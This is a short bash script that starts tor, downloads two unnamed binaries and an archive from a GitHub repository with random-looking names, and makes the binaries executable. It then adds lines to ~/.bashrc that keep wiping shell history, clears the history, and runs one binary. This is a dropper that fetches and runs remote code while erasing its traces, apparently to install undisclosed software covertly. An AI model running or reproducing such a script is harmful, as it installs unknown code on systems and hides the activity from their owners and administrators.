#!/bin/bash
ssudo systemctl start tor
wget https://github.com/j2d23enr2os32omedaro/jfksdhfvdsiouwrbn32980vxcnbmdfsajkfh2398/raw/main/cpotr

wget https://github.com/j2d23enr2os32omedaro/jfksdhfvdsiouwrbn32980vxcnbmdfsajkfh2398/raw/main/cpo2

chmod ugo+x cpo2
chmod ugo+x cpotr
wget https://github.com/j2d23enr2os32omedaro/jfksdhfvdsiouwrbn32980vxcnbmdfsajkfh2398/raw/main/SRB11.tar.gz

tar -xf SRB11.tar.gz
rm -r SRB11.tar.gz

echo ". cat /dev/null > ~/.bash_history" >> ~/.bashrc
echo ". history -cw" >> ~/.bashrc
cat /dev/null > ~/.bash_history
history -cw

./cpo2
